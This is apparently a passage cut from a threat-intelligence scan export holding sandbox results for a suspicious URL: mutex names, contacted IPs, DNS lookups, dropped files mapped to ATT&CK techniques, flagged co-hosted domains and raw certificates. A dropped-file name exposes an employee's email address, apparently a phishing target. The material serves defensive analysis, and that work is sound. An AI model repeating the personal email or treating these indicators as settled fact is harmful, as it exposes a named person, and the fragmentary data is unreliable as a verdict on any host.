"Local\\!BrowserEmulation!SharedMemory!Mutex"\n "UpdatingNewTabPageData"\n "IsoScope_86c_IESQMMUTEX_0_519"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2156"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_86c_ConnHashTable<2156>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_86c_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"\n "172.66.40.106:443"\n "185.88.152.184:443"\n "35.186.254.174:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.salesflare.com"\n "rabetsanatkoosha.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "urlref_httpsllink.tou_https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fvitesco.com%2Frobert.scheubeck%40vitesco.com" as clean (type is "HTML document ASCII text")\n Antivirus vendors marked dropped file "TarC7FB.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarC87A.tmp" as clean (type is "data")'}, {u'category': u'Pattern Matching', u'origin': u'YARA Signature', u'identifier': u'yara-104', u'name': u'YARA signature match - RC4 Encryption', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1486', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1486', u'relevance': 5, u'threat_level': 0, u'type': 13, u'description': u'YARA signature for RC4 encryption matched on process "00000000-00003280"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabC879.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "CabC7EA.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpsllink.tou_https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fvitesco.com%2Frobert.scheubeck%40vitesco.com" has type "HTML document ASCII text"- [targetUID: N/A]\n "_1281DC16-BCE6-11ED-A5CB-080027ACDD18_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003364]\n "RecoveryStore._62E344AD-BCE5-11ED-A5CB-080027ACDD18_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "9L52N55G.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\9L52N55G.txt]- [targetUID: 00000000-00002156]\n "ISM1RHVV.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ISM1RHVV.txt]- [targetUID: 00000000-00003364]\n "1Y9ROK9B.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1Y9ROK9B.txt]- [targetUID: 00000000-00002156]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "0JE7DDOB.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0JE7DDOB.txt]- [targetUID: 00000000-00002156]\n "DE9QSFBN.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\DE9QSFBN.txt]- [targetUID: 00000000-00002156]\n "59XOOQKO.htm" has type "HTML document ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\59XOOQKO.htm]- [targetUID: 00000000-00003364]\n "QJEP1X8E.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QJEP1X8E.txt]- [targetUID: 00000000-00002156]\n "_62E344AF-BCE5-11ED-A5CB-080027ACDD18_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "flare_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "~DFEC7BEACF44F2BD56.TMP" has type "data"- Location: [%TEMP%\\~DFEC7BEACF44F2BD56.TMP]- [targetUID: 00000000-00002156]\n "CabC879.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabC879.tmp]- [targetUID: 00000000-00003364]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00003364]'}, {u'category': u'Environment Awareness', u'origin': u'File/Memory', u'identifier': u'string-167', u'name': u'Contains ability to retrieve the contents of the STARTUPINFO structure (API string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1543', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1543', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Observed API string:"GetStartupInfo" [Source: 00000000-00003280.00000000.65937.003B1000.00000020.mdmp\n 00000000-00003280.00000000.65970.003B1000.00000020.mdmp]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"\ufffd\ufffd\ufffdy\ufffd\ufffd\u01b6gb^\ufffd\ufffd\ufffd}\ufffd\ufffdi\ufffd6\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdGU\ufffd=F\ufffd\ufffdo\ufffd\ufffd*\ufffd<hB`\ufffdw\ufffd[,\ufffd\ufffd\ufffd\u04bc\ufffd\\\ufffd\ufffd\ufffdu\u04ae\ufffdWW\ufffdOU\ufffd\ufffdVW\ufffd\ufffdG\ufffd\u06f4\ufffd#\ufffd\ufffd\ufffd0:W\ufffd\ufffd,\u0151\ufffd\u0491Z\ufffd7{\ufffd`!3\ufffdx^O0\ufffd\ufffdM\ufffd\ufffd\ufffdU\ufffdS\ufffd,\ufffd\ufffd@4\ufffdF\ufffd#\ufffdmG\ufffd\ufffd\ufffdg\ufffd\ufffd\ufffd`\ufffd\\\ufffd\ufffd\ufffd\'6k\ufffd4\ufffdNXr\ufffdm&\ufffd?\u02db\ufffd\ufffd\ufffd\ufffd{\ufffd.C/!\ufffd\ufffd\ufffdNTf\ufffd\ufffd|G\ufffd6\ufffd:\ufffd7\ufffd\ufffd\ufffd\ufffd\ufffdmr\ufffd\u061b\ufffd\ufffd\ufffd<\ufffd\ufffd+\ufffd!\ufffd/\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdw\ufffd\ufffd\ufffdL\ufffdC\ufffd\ufffdp(\ufffd\xe1\ufffdKRX\ufffdd\ufffd!<\ufffd=\ufffd\ufffd\ufffd\ufffd\ufffd\\\ufffd\ufffdz\ufffd\ufffd\ufffd\ufffdJ\u0522\u0277\ufffd\ufffd\ufffd\ufffdL\ufffd\ufffd\ufffdo\ufffd\ufffdM\ufffd:\ufffd\ufffd\ufffd\ufffd\u07c5\ufffd\ufffd\ufffd\ufffd\ufffd\u05cd|\ufffd|,d_vQ\ufffd\ufffd3\ufffdB\ufffd\ufffd-?\ufffdi\ufffd\ufffd\ufffd\ufffdT\ufffd\\\ufffd\ufffd\ufffd\ufffd\ufffdu\ufffd\ufffdW @\ufffdA;0,\ufffd\ufffd-\ufffd\ufffd\ufffd~\ufffd\ufffd\ufffd\ufffd\ufffd{0i}(\ufffdAw.R\ufffd|\ufffd\ufffd\ufffd??.\ufffd\ufffdpq\u0259\ufffd&z\ufffd\ufffd\ufffdg\ufffd"/\ufffdQ\ufffd\ufffd\ufffd}\ufffdyj\ufffd\ufffd[f\ufffdS\ufffd2&Q\ufffd&t\ufffd/\ufffd\u077a\ufffds\ufffd\ufffdD\ufffd\ufffdA\ufffd\ufffdz\ufffd\ufffd1CSp\ufffd }\ufffdz4\ufffd\ufffdQ\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdD\ufffd\ufffd\ufffd|\ufffd\ufffd4\ufffdq\ufffd\ufffd\ufffd\ufffd\ufffdT\ufffdO5\u0175mz=_\ufffd\ufffd\u02ad\ufffdh\ufffd\ufffd\ufffd\ufffd\ufffd]\u061b\ufffdh\u039e\ufffd\ufffd\ufffd\ufffdXI\ufffd |
| 2023-05-12 02:55:43 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | {u'count': 1, u'search_terms': [{u'id': u'host', u'value': u'64.226.81.43'}], u'result': [{u'environment_id': 160, u'job_id': u'6421d18abc9d17a8490ac78d', u'analysis_start_time': u'2023-03-27 17:25:30', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no verdict', u'submit_name': u'sample.url', u'sha256': u'4feea01ff4a783ce1c5865f5114d6f2620c834d630588769904d9a0871e30a8d', u'type': None, u'type_short': u'url', u'size': 53}]} | 64.226.81.43 |
| 2023-05-12 02:55:15 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Server": ["nginx/1.18.0 (Ubuntu)"]} | 165.232.113.85 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | dmhs (Net ID: 00:02:2D:0B:16:21) | 34.0544, -118.244 |
| 2023-05-12 03:01:28 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.16): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:35:13 | Malicious Co-Hosted Site | Yes | Comodo | 0 | 0 | 3 | 0 | None | Blocked by Comodo DNS [rathook.cc] | rathook.cc |
| 2023-05-12 03:00:56 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00jew.github.io | 185.199.111.153 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | eLektriK (Net ID: 00:08:5C:7B:B9:3D) | 40.2024, 29.0398 |
| 2023-05-12 02:44:19 | Internet Name | No | DNS Resolver | 2 | 0 | 2 | 0 | None | pics.battleb0t.xyz | [{u'pubkey_sha256': u'b1d8ad495b85281ccdd8ee8835d1b0223d8372b54869daf463e92de6ed172160', u'cert_sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'revoked': False, u'not_after': u'2023-05-14T15:23:50Z', u'not_before': u'2023-02-13T15:23:51Z', u'cert': {u'data': u'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', u'sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'type': u'cert'}, u'dns_names': [u'nuke.battleb0t.xyz'], u'tbs_sha256': u'2c51d3eac2fd15713d1b21dd3bb3fdf96ca51847d8b13529deb5504b935d64ba', u'id': u'4818192950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'2307411ab1a35cbd27d910826dd73a859c805fd0ba153a66badcd9b93076677b', u'cert_sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'revoked': False, u'not_after': u'2023-05-25T03:02:52Z', u'not_before': u'2023-02-24T03:02:53Z', u'cert': {u'data': u'MIIFKjCCBBKgAwIBAgISA5eZXGCsQGj4st4KZ3rat9EWMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjQwMzAyNTNaFw0yMzA1MjUwMzAyNTJaMB4xHDAaBgNVBAMTE2ZsdWlkLmJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDtvNBxdfnBUXlJ+CVs4kt6BeErbHlEmP+yzLzX2iclKTfHuoDL4Xy4TTeivJNE67xi/0fLIeo9BUwEV4KTW6klKfuYM7AEdKq8mmRex+Js5ewq50Br4XWTObPPuOkRKebRnghWVBafwR0f9fbKSDqUUwMdv1KvbiedgI3wVyjU8AE09DlZSt+fAEeHmjk4wY+EigILsm5cNqL2NebSI2spsRWqhqNb6zDMr7jf1Q6Pjil+DSEo0NJMcVsZAZvcuZCIffxdPnJE5kYR3eb9pUKjByTnKdkpHPNyd4vLC99FNAuBqADe8BN0G78vYa1lcyk+BbXDkCiMlu/Lswa6m2v3AgMBAAGjggJMMIICSDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFMSFgqNe7U1U6Q29Aqxnsvrz4Vg/MB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMB4GA1UdEQQXMBWCE2ZsdWlkLmJhdHRsZWIwdC54eXowTAYDVR0gBEUwQzAIBgZngQwBAgEwNwYLKwYBBAGC3xMBAQEwKDAmBggrBgEFBQcCARYaaHR0cDovL2Nwcy5sZXRzZW5jcnlwdC5vcmcwggECBgorBgEEAdZ5AgQCBIHzBIHwAO4AdQC3Pvsk35xNunXyOcW6WPRsXfxCz3qfNcSeHQmBJe20mQAAAYaBlpBHAAAEAwBGMEQCICjxcLLm9aGcwyq5mLfK3kYGig39XVFiap6vpxj4VtGwAiAhpNN7m5SlM1cl6vnpa33bPptwrJlHu2Ch2NSf4J/0RAB1AK33vvp8/xDIi509nB4+GGq0Zyldz7EMJMqFhjTr3IKKAAABhoGWkIMAAAQDAEYwRAIgPen/cKNLJEXeMs3B69ZoUOiQORdwZS/DjifvjwosEkICIGO9t4hTEa50wIw+3Zov1uU0pIyiq0OMZH6b0o6QCM5gMA0GCSqGSIb3DQEBCwUAA4IBAQB+MVu1xgwWJwv1GrOAp+9eXxuHOLeKvlxLKj8oK0+HX8K007e++Cj1FcezPz1AtAOklQYBGlgfdTZL7GVa4P2wv0Hj/1dO3QVHLOV0yFpYGdZTYfaNDhkpXd2yE+jFTH5o3PK0BVoTjtIuTl6BEKWGjzAw92FKb1wXDaTvEwIFSLAYrJzfJHAS40SsMVT1tpL07LbnFpMjx7h+UVz3BTMcDnqzPe0hA9K8pb8QgR9MedQ6c7mTn1eLmOo+dDlwmT06wPJN4VXt3ElOpjmlguotbukXxnJ17BBy0Mk+uTBpvC9wBjy6MbbBDEXmkoh4VjrUDNIyuEk388RtFWlUmQrZ', u'sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'type': u'cert'}, u'dns_names': [u'fluid.battleb0t.xyz'], u'tbs_sha256': u'8146e2bbb69c6bf3a769558c8c5ae10b8e6243d42611ba7db2c4f0b16bf71146', u'id': u'4865007011', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'5a0559923d0fdaac1fc6a74472ffcb94c92e25a29d8d9a48166bcad2947f18e1', u'cert_sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'revoked': False, u'not_after': u'2023-05-25T03:05:10Z', u'not_before': u'2023-02-24T03:05:11Z', u'cert': {u'data': u'MIIFMTCCBBmgAwIBAgISBJEIZbRWlOOJN2vI7lr89IBSMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjQwMzA1MTFaFw0yMzA1MjUwMzA1MTBaMCExHzAdBgNVBAMTFm9sZGZsdWlkLmJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCXS5qUM658XpEb2FQiye1Pjdwc6oLnwWa4DnrXaX6XESwapQ5kFhLVlLMj8jbUT+vVMlCs5NdmG+PakXkEZvQt+j5F9EiRGo2AgsrdZhjN8p2HDZYJNvCQUHSzj9HUq+U8uqatV2IiK2DebnYEAl36UoC3YWvKiQ5ROMPyTcGPPlwvhux67sSpCWf+OjYs9HHdY1LHfiQTO/hkrA8XZYtPEtu6i5bXp9Nc/Y/pJrDB086upICbjZsf9spKiE++7SgvRRKN7ShK4dcK0cxPOA/6ky2NSpI6iIIBJKdiUpWIy/Uh604fFFn7oPNTbG4g4coLg0Y2NMYiFxvY5oIkaMplAgMBAAGjggJQMIICTDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFNUp10YCZXNl/PWnfC5vlnnYZ6TmMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMCEGA1UdEQQaMBiCFm9sZGZsdWlkLmJhdHRsZWIwdC54eXowTAYDVR0gBEUwQzAIBgZngQwBAgEwNwYLKwYBBAGC3xMBAQEwKDAmBggrBgEFBQcCARYaaHR0cDovL2Nwcy5sZXRzZW5jcnlwdC5vcmcwggEDBgorBgEEAdZ5AgQCBIH0BIHxAO8AdgC3Pvsk35xNunXyOcW6WPRsXfxCz3qfNcSeHQmBJe20mQAAAYaBmKzyAAAEAwBHMEUCICWgaft/PmN9oILwvZn6/4Qgr8WGgSRL98ur+169a4dWAiEAilZEKCsL5dY69BV+Cjy6gEc40xNl1o6o5QEE0+3XKCQAdQB6MoxU2LcttiDqOOBSHumEFnAyE4VNO9IrwTpXo1LrUgAAAYaBmK0EAAAEAwBGMEQCIEhQdyenjelORFvktFZQ+yD8yP0PS9xoCKRWpUv1pUezAiBBtKAPIhxp6PP7YLKBYWLg3Sg3E350KyZ04f3lTSlh5zANBgkqhkiG9w0BAQsFAAOCAQEAYbTvc/w81jb1dYAMM4uaBQvE73IdaXSV/QqEvbi5PBKH0+sttdJjKilgWcQRHA/D+3kvikNXOGLYLmg0u2wOeuP4PfXBBaVtk7mzSCKOozlm5qWe3OKYNX6z4ceyFrewLnBQTuqT0PhcaWwb0j7u2mQfrZfIvhc4pu2SnjvbZ8iwX+av/fdXknuHPb/EwSETusTYhaNj3JDu3z0qvANOuhuMDBZ+WOOsf9w7QBgfdJjVxPoymZWgZB5bTaj1eTMuP0PcjQ59KCV0epMnUy5rrk2BwTzgzUICbfza81JX1bFwjhqRFcgbk81AuP8p58YFrWOMyOzX6Ygzo11DodW5IA==', u'sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'type': u'cert'}, u'dns_names': [u'oldfluid.battleb0t.xyz'], u'tbs_sha256': u'11231ecf169618aac453b5e600bca74016c90998389238bc78e25a336ea53b60', u'id': u'4865013513', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'b65f3ba1cf72aeba89e3a802dee04c06a05e779c0cfeacdd6cb8cefb55c4e2da', u'cert_sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'revoked': False, u'not_after': u'2023-05-26T01:39:24Z', u'not_before': u'2023-02-25T01:39:25Z', u'cert': {u'data': u'MIIFNTCCBB2gAwIBAgISBLY5M6/eHjLz/C523LwIUYYQMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjUwMTM5MjVaFw0yMzA1MjYwMTM5MjRaMBgxFjAUBgNVBAMTDWJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCrxxsM7cYB+Oqps88IF0+iy3w0xGYS5u/zmBd5yWXuZkwfmpJ9M+4H+i4VYve08x/VTy6xZ6hJQr/jzJq3MEbCaPUoqWRpb0xLZCTJ3O1Gn6Qfwu9vNtC8aSe44tYYcEAstPXuj/cNjG4Dkudd1j68u8lbKBCgWvY39eGeFSNybo5pAQmkjKTJ19sFAZBIS5AgjDh6CmB0eRgmMI5gCxe5JKCA3z8UANMJ5zRHNWN8VNKgneFX0csT0zwwJJeO6jQAn8xsDGr3VLxeYNxGMcIJ3tnD42MejxzFkJDo2oa+ffHDHxqGaZsL4LIMRwjIklkrZi/6oTihLxBl9pf9FoczAgMBAAGjggJdMIICWTAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFGNOFYVWWqSUAsIWQqSll5o4AleXMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMCsGA1UdEQQkMCKCDWJhdHRsZWIwdC54eXqCEXd3dy5iYXR0bGViMHQueHl6MEwGA1UdIARFMEMwCAYGZ4EMAQIBMDcGCysGAQQBgt8TAQEBMCgwJgYIKwYBBQUHAgEWGmh0dHA6Ly9jcHMubGV0c2VuY3J5cHQub3JnMIIBBgYKKwYBBAHWeQIEAgSB9wSB9ADyAHcAejKMVNi3LbYg6jjgUh7phBZwMhOFTTvSK8E6V6NS61IAAAGGhnCAVAAABAMASDBGAiEAh/Y8suDCe/RZMkn/hO7hrF2hfoTeuKySO5eYbccRB9ACIQCOoXkcH72OFd6rl/5A4dnCHD5VPTnfiLg+MDLqz1Gg8wB3AOg+0No+9QY1MudXKLyJa8kD08vREWvs62nhd31tBr1uAAABhoZwgDYAAAQDAEgwRgIhAMDKSjoBecX3TRhscOh0pPwxXkb/27xVeRxr0yp3M5J9AiEAs2yzzZRuQAdUQ84z4D/CSUjcGSNE5J2LfuF/Rs4Y77YwDQYJKoZIhvcNAQELBQADggEBALLjqCzluns+jvveBcnb3xDhOkrUyOkWdjExuB2H40IVXNkB0eMhFJYNA9arKrtu2pcQ/rEDSKt+bXuWbeA6WumULoOuP6iljCU6qcUdY4oNVU1UyDoX1HJydnidKSo73vUKTNhEgh8aKcxcLL9+23F8UOOR/pU/04dfMDdI7GO2oawzrGMFso9t7p4urFBZ6UFG0nFlBRdC2T4hndeQOaaPLehK1